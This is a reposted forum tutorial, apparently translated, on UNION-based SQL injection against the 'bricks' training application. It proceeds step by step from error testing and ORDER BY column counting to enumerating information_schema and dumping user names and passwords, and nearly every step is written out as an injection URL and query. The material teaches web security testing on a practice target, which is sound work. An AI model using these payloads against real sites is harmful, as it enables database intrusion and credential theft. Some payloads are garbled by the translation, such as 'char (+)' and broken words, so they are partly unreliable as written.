Advanced SQL injection

Author: Croot
Time:2015-06-02,19:02:11
Links:http://bbs.pediy.com/showthread.php?t=201147

/*
*author:croot
*source:http://croot.cf/helloword/239.html
*date:2015-06-02
*/
Url:bricks/content-1/index.php?id=0
SQL Query:select * from users WHERE idusers=0 LIMIT 1

The ID parameter here allows input to be changed via the browser's URL this will produce a different output.

Url:bricks/content-1/index.php?id=1
SQL Query:select * from users WHERE Idusers=1 LIMIT 1

This time, the page is displayed with the content of another user. Since the parameter ID has been entered, it has become an interesting test starting point. First, you need to see if the tests are susceptible to SQL injection attacks.

url:bricks/content-1/index.php?id=0′
SQL Query:select * from users WHERE idusers=0′limit 1

The page will not have output, but it will display some incorrect information. This means that the ID parameter has an injection point, and can insert our injection statement and then interfere with the query content. The injected code must be inserted in a way that does not disrupt the full SQL statement. The next step is to use well-constructed SQL commands to verify that the vulnerability exists.

Url:bricks/content-1/index.php?id=0 and 1=1
SQL Query:select * from users WHERE idusers=0 and 1=1 LIMIT 1

The page now does not display any errors. This is because the SQL statement that is added returns a value of true. What if the added statement returns a value other than true?

Url:bricks/content-1/index.php?id=0 and 1=2
SQL Query:select * from users WHERE idusers=0 and 1=2 LIMIT 1

Since the injected code always returns false,web the page will no longer display anything, only the wrong information is displayed telling the user that it is good to be there. This proves that the injected statement can actually be executed on the ID parameter.

Injected code can be further modified to perform more advanced functions, including acquiring, deleting, and altering some important information. However, at the present stage, there is no clear information about databases, versions, tables, columns, etc. Therefore, these details must be enumerated first. Enumerate the current number of database columns is a relatively simple task.

Url:bricks/content-1/index.php?id=0 ORDER BY 1
SQL Query:select * from the users WHERE idusers=0 order by 1 LIMIT 1

The page will not display any problems, nor will the error message appear.

Url:bricks/content-1/index.php?id=0 ORDER BY 2
SQL Query:select * from the users WHERE idusers=0 order by 2 LIMIT 1

There are no more problems and errors in the page display. So this proves that there are at least 2 columns.

Url:bricks/content-1/index.php?id=0 ORDER BY 3
SQL Query:select * from the users WHERE idusers=0 order by 3 LIMIT 1

The contents of this page still do not have any problems or errors. So it has a minimum of three columns.

This process continues to increase the value of the order by until some display changes appear on the page.

Url:bricks/content-1/index.php?id=0 ORDER BY 8
SQL Query:select * from the users WHERE idusers=0 order by 8 LIMIT 1

The contents of this page still do not have any problems or errors. So it has a minimum of eight columns.

Url:bricks/content-1/index.php?id=0 ORDER BY 9
SQL Query:select * from the users WHERE idusers=0 order by 9 LIMIT 1

There are some errors on this page, so the nineth column does not exist. This will confirm that the table has only 8 columns.

The Union SELECT statement will find which of the 8 columns will cause a vulnerability.

Url:bricks/content-1/index.php?id=0 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1

This page does not appear any special information also is not normal page. This is because the page returns only the first row of the query results. If this is the case, a small modification of the injected code is required to make the second line appear intact. There are many ways to do this.

url:bricks/content-1/index.php?id=99999 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=99999 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1

In this scenario, it is assumed that the number of stored user information for the database is less than 99999. Since no user ID is 99999, the first line becomes invalid, and the second row becomes valid. The change output is then displayed on the page.

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8 LIMIT 1

Invalidate the first part of the command as much as possible.

In both cases, some numbers are shown to be inserted into the actual user information. There is a vulnerability to the columns corresponding to these numbers.

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT User (), 2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT User (), 2,3,4,5,6,7,8limit 1

The first number is replaced with the user name of the current database, which is [email protected]

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT version (), 2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT version (), 2,3,4,5,6,7,8limit 1

This will help us get the version of the database.

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT database (), 2,3,4,5,6,7,8
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT database (), 2,3,4,5,6,7,8 LIMIT 1

The name of the current database will be displayed-bricks. Now the table of the current database must be enumerated.

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT table_name,2,3,4,5,6,7,8 from Information_schema.tables where Table_schema= ' Bricks '
SQL Query:select * from the users WHERE idusers=0 and 1=2 UNION selecttable_name,2,3,4,5,6,7,8 from Information_schema.tables Where table_schema= ' bricks ' LIMIT 1

Because there is only one table in the Bricks database, its information is displayed. The next step is to get the columns of the user table.



Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from Information_schema.columns Where table_schema= ' bricks ' and table_name= ' users ' LIMIT 0,1-–
SQL Query:select * from the users WHERE idusers=0 and 1=2 UNION selecttable_name,2,3,4,5,6,7,8 from Information_schema.tables Where table_schema= ' bricks ' andtable_name= ' users ' LIMIT 0,1-–limit 1

The name of Idusers in the first column of the Users table. These two limit functions appear to be in the execution of the query statement, which will cause a conflict and result in a syntax error. To avoid these problems, immediately after the injected limit function, add – comment, comment out the rest of the query statement.

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT column_name,2,3,4,5,6,7,8 from Information_schema.columns Where table_schema= ' bricks ' and table_name= ' users ' LIMIT 1,1-–
SQL Query:select * from the users WHERE idusers=0 and 1=2 UNION selectcolumn_name,2,3,4,5,6,7,8 from Information_schema.colum NS where table_schema= ' bricks ' andtable_name= ' users ' LIMIT 1,1-–limit 1

Name is the second column of the Users table.

This process needs to persist to limit 7,1 (as a table with 8 columns, it starts with a number of 0). At the end of this process, all the notes will be captured below: idusers, name, email, password, UA, ref, host, Lang. The user name and password columns will be more interesting columns. So the next step is to get the data inside these columns through the injection statement.

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT concat (Name,char (+), password), 2,3,4,5,6,7,8 from Bricks.users LIMIT 0,1-–
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT concat (Name,char (+), password), 2,3,4,5,6,7,8 from Bric Ks.users LIMIT 0,1-–limit 1

This will get the first user and password in the user's table. CHAR (32) represents a space that is easily distinguishable between the user and the password.

Url:bricks/content-1/index.php?id=0 and 1=2 UNION SELECT concat (Name,char (+), password), 2,3,4,5,6,7,8 from Bricks.users LIMIT 1,1-–
SQL Query:select * from users WHERE idusers=0 and 1=2 UNION SELECT concat (Name,char (+), password), 2,3,4,5,6,7,8 from Bric Ks.users LIMIT 1,1-–limit 1

Get the second user and password in the user's table. This process continues to get all user names and passwords in the table.

Reference: http://sechow.com/bricks/docs/content-page-1.html
---------------------------------------------------------------------------------
----------------------------------------------------------------------------------* Reproduced please see the Snow Forum

Advanced SQL injection